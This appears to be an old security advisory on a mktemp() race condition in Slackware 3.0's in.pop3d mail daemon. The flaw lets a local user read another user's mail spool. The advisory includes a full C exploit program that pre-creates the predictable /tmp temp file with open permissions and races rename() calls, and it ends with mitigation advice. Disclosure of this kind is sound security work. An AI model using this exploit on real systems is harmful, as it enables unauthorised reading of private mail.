COMMAND

    /usr/sbin/in.pop3d

SYSTEMS AFFECTED

    Slackware 3.0 Linux with pop3d enabled

PROBLEM

    As explained before  in the mailx  vulnerability for Linux,  there
    is a problem with usage of  mktemp() in many programs.  This  is a
    follow-up to  that, demonstrating  the generic  denial of  service
    attack and a race condition  attack on linux's Slackware 3.0  pop3
    mail daemon.  Refer to the original mailx post for information  on
    the security concerns with the use of mktemp().

    Linux's  /usr/sbin/in.pop3d  contains  a  mktemp() race condition,
    exploitable when pop client connects  to the machine at the  point
    a correct  password for  a user  is entered.   This allows  you to
    read the contents of  the mail spool of  a user when they  connect
    with  a  pop  client.   Author  of  following  exploit  is Dave M.
    (davem@cmu.edu).

    The  predictability  of  mktemp()  is  exploited  to  create   the
    temporary  files  after  the  filenames  have  been determined but
    before they are actually  created, allowing the mail  being dumped
    to those temporary files to be read by the creator of the files.

pop3d-exploit.c:
/* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d
   under Slackware 3.0), which can  then be read by the  program. This
   race  condition  is  NOT  always  successful,  it  may take extreme
   conditions to ensure a high probability of success.

   Dave M. (davem@cmu.edu)
 */

    #include <stdio.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <fcntl.h>

    main(int argc, char **argv)
    {
      int race;
      int i;
      char fname[80], tmpf[80];    /* hold filename */

      umask(0);

      if(argc<1)
	{
	  printf("pop3 racer\nSyntax: %s process-id\n",argv[0]);
	  return -1;
	}

      /* create tmp file to race creating */
      strcpy(tmpf,"/tmp/pop3");
      for(i=strlen(argv[1]);i<6;i++)
	strcat(tmpf,"0");
      strcat(tmpf,argv[1]);
      tmpf[9] = 'a';

      race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);

      while(1)
	{
	  rename(tmpf,"/tmp/pop.exploit");
	  if(rename("/tmp/pop.exploit",tmpf) < 0)
	    {
	      printf("race lost - file created.\n"); /* catch 1/2 the losses */
	      break;
	    }
	}
    }

SOLUTION

    Temporary  patch  would  be  disable  pop3d  in  you find yourself
    vulnerable. Anyway, you should upgrade your software.